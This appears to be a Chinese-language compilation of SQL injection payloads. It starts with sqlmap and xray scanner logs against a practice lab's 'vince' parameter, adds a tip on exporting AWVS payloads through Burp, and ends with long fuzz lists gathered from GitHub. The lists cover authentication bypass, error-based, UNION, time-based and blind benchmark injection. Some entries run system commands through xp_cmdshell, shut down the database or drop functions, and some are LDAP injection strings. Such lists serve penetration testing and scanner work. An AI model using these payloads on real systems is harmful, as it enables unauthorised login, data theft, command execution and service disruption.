[11:06:03] [PAYLOAD] vince' AND (SELECT 4143 FROM (SELECT(SLEEP(5-(IF(69=69,0,5)))))UydH) AND 'ROmt'='ROmt
[11:06:08] [PAYLOAD] vince' AND (SELECT 7451 FROM (SELECT(SLEEP(5-(IF(94 69,0,5)))))NCXY) AND 'jLaU'='jLaU
[11:06:08] [DEBUG] checking for parameter length constraining mechanisms
[11:06:08] [PAYLOAD] vince' AND (SELECT 5146 FROM (SELECT(SLEEP(5-(IF(8047=
[11:06:13] [PAYLOAD] vince' AND (SELECT 7552 FROM (SELECT(SLEEP(5-(IF(2554>2553,0,5)))))YWab) AND 'LuVp'='LuVp
[11:06:18] [PAYLOAD] vince' AND (SELECT 5150 FROM (SELECT(SLEEP(5-(IF(VERSION() LIKE 0x254d61726961444225,0,5)))))wfVL) AND 'aYWP'='aYWP
[11:06:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:06:18] [PAYLOAD] vince' AND (SELECT 1675 FROM (SELECT(SLEEP(5-(IF(VERSION() LIKE 0x255469444225,0,5)))))BvcY) AND 'cvMR'='cvMR
[11:06:18] [PAYLOAD] vince' AND (SELECT 2382 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x256472697a7a6c6525,0,5)))))zSvS) AND 'hBBm'='hBBm
[11:06:18] [PAYLOAD] vince' AND (SELECT 9913 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x25506572636f6e6125,0,5)))))hHGN) AND 'FjRb'='FjRb
[11:06:18] [PAYLOAD] vince' AND (SELECT 2776 FROM (SELECT(SLEEP(5-(IF(AURORA_VERSION() LIKE 0x25,0,5)))))yPUm) AND 'Obkk'='Obkk
xray
字符型
vince'and/**/extractvalue(1,concat(char(126),md5(1488521800)))and'
vince'and'b'='b
vince'and'y'='t
vince"and"z"="z
vince"and"z"="u
vince'and(select*from(select+sleep(0))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(2))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
数字型
id=1&submit=查询'and'p'='p
id=1'and/**/extractvalue(1,concat(char(126),md5(1181317772)))and'&submit=查询
id=1&submit=查询'and'g'='l
id=1"and/**/extractvalue(1,concat(char(126),md5(1217404665)))and"&submit=查询
id=1&submit=查询"and"o"="o
id=extractvalue(1,concat(char(126),md5(1660084292)))&submit=查询
id=1&submit=查询"and"b"="e
id=1&submit=查询'and/**/extractvalue(1,concat(char(126),md5(1755264351)))and'
id=1&submit=查询"and/**/extractvalue(1,concat(char(126),md5(1665280176)))and"
id=1&submit=extractvalue(1,concat(char(126),md5(1897629256)))
id=1&submit=查询'and(select'1'from/**/cast(md5(1676192137)as/**/int))>'0
id=1&submit=查询/**/and/**/cast(md5('1674634432')as/**/int)>0
id=1&submit=convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1523921760')))
id=1&submit=查询'and(select*from(select+sleep(0))a/**/union/**/select+1)='
id=1&submit=查询'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1405899186')))>'0
id=1&submit=查询'and(select*from(select+sleep(2))a/**/union/**/select+1)='
id=1&submit=查询鎈'"\(
id=1&submit=查询"and(select*from(select+sleep(0))a/**/union/**/select+1)="
id=1&submit=查询'"\(
id=1&submit=查询"and(select*from(select+sleep(2))a/**/union/**/select+1)="
id=1&submit=查询'/**/and(select'1'from/**/pg_sleep(0))::text>'0
id=1&submit=查询'/**/and(select'1'from/**/pg_sleep(2))::text>'0
id=1&submit=查询'and(select+1)>0waitfor/**/delay'0:0:0
id=1&submit=查询'and(select+1)>0waitfor/**/delay'0:0:2
id=1&submit=查询'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
id=1&submit=查询'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='o
id=1/**/and+3=3&submit=查询
id=1/**/and+0=6&submit=查询
id=1'and't'='t&submit=查询
id=1'and'f'='o&submit=查询
id=1"and"g"="g&submit=查询
id=1"and"u"="i&submit=查询
id=(select*from(select+sleep(0)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(2)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
搜索型
vince'and/**/extractvalue(1,concat(char(126),md5(1626960232)))and'
vince'and'g'='g
vince'and'o'='l
vince"and"q"="q
vince"and"h"="x
vince'and(select*from(select+sleep(0))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(2))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='&submit
报错型
'and/**/extractvalue(1,concat(char(126),md5(1776632033)))and'
and(select*from(select+sleep(0))a/**/union/**/select+1)
'and(select*from(select+sleep(2))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
add=&email='and/**/extractvalue(1,concat(char(126),md5(1194503700)))and'&password=123123&phonenum=&sex=&submit=submit&username=
add=&email=&password=123123&phonenum=&sex=and""z"""
extractvalue(1,concat(char(126),md5(1760117950)))&username
submit'and(select'1'from/**/cast(md5(1744730361)as/**/int))>'0&username
submit/**/and/**/cast(md5('1907172907')as/**/int)>0&username
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1108003637')))&username
submit'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1599639292')))>'0&username
'and/**/extractvalue(1,concat(char(126),md5(1463295133)))and'
报错型
56'and/**/extractvalue(1,concat(char(126),md5(1045862347)))and'
56/**/and+2=2
56"and/**/extractvalue(1,concat(char(126),md5(1310092426)))and"
56/**/and+0=9
extractvalue(1,concat(char(126),md5(1030526389)))
56'and'i'='i
56'and'g'='y
56"and"l"="l
56"and"n"="f
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(5)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)
awvs
由于awvs出问题了,激活失效了,暂时不能用。
说一下思路吧,将AWVS的流量代理到burp中,进行扫描,burp会全程记录数据包。安装logger++插件,可以自定义的把burp的流量导出来。可以直接把payload导出来。放进excel,用分列功能提出payload 。 然后如果有编码,可以直接使用解码工具进行解码
github收集
fuzz
"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1
"or 1=1
'xor
'or 1=1/*
1'or'1'='1
'
a' or 1=1--
"a"" or 1=1--"
or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
ý or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or%201=1
or%201=1 --
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
ý or 3=3 --
"
#
-
--
' --
--';
' ;
= '
= ;
= --
\x23
\x27
\x3D \x3B'
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
';shutdown--
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 0=0 #
"' or 1 --'"
" or 1=1 or ""="
" or "a"="a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
<>"'%;)(&+
' and '' like '
' AnD '' like '
' or '' like '
' and '' like '%
' aND '' like '%
' and '' like ''--
' and 2>1--
' and 2>3--
') and ('x'='x
) and (1=1
¡® or 1=1 --
¡® or 3=3 --
Generic SQL Injection Payloads
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator
@variable local variable
@@variable global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
Comments:
# Hash comment
/* C-style comment
-- - SQL comment
;%00 Nullbyte
` Backtick
Generic Error Based Payloads
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
HAVING 1=1
HAVING 1=0
HAVING 1=1#
HAVING 1=0#
HAVING 1=1--
HAVING 1=0--
AND 1=1
AND 1=0
AND 1=1--
AND 1=0--
AND 1=1#
AND 1=0#
AND 1=1 AND '%'='
AND 1=0 AND '%'='
AND 1083=1083 AND (1427=1427
AND 7506=9091 AND (5913=5913
AND 1083=1083 AND ('1427=1427
AND 7506=9091 AND ('5913=5913
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=1--
AS INJECTX WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=1--
WHERE 1=1 AND 1=0--
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 11--
ORDER BY 12--
ORDER BY 13--
ORDER BY 14--
ORDER BY 15--
ORDER BY 16--
ORDER BY 17--
ORDER BY 18--
ORDER BY 19--
ORDER BY 20--
ORDER BY 21--
ORDER BY 22--
ORDER BY 23--
ORDER BY 24--
ORDER BY 25--
ORDER BY 26--
ORDER BY 27--
ORDER BY 28--
ORDER BY 29--
ORDER BY 30--
ORDER BY 31337--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
ORDER BY 11#
ORDER BY 12#
ORDER BY 13#
ORDER BY 14#
ORDER BY 15#
ORDER BY 16#
ORDER BY 17#
ORDER BY 18#
ORDER BY 19#
ORDER BY 20#
ORDER BY 21#
ORDER BY 22#
ORDER BY 23#
ORDER BY 24#
ORDER BY 25#
ORDER BY 26#
ORDER BY 27#
ORDER BY 28#
ORDER BY 29#
ORDER BY 30#
ORDER BY 31337#
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
ORDER BY 5
ORDER BY 6
ORDER BY 7
ORDER BY 8
ORDER BY 9
ORDER BY 10
ORDER BY 11
ORDER BY 12
ORDER BY 13
ORDER BY 14
ORDER BY 15
ORDER BY 16
ORDER BY 17
ORDER BY 18
ORDER BY 19
ORDER BY 20
ORDER BY 21
ORDER BY 22
ORDER BY 23
ORDER BY 24
ORDER BY 25
ORDER BY 26
ORDER BY 27
ORDER BY 28
ORDER BY 29
ORDER BY 30
ORDER BY 31337
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,1,1))='X'
and (select substring(@@version,1,1))='M'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
Generic Time Based SQL Injection Payloads
# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SQL Injection Auth Bypass Payloads
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
sql bind insert
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sql bind where
and 0=benchmark(3000000,MD5(1))%20/*
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
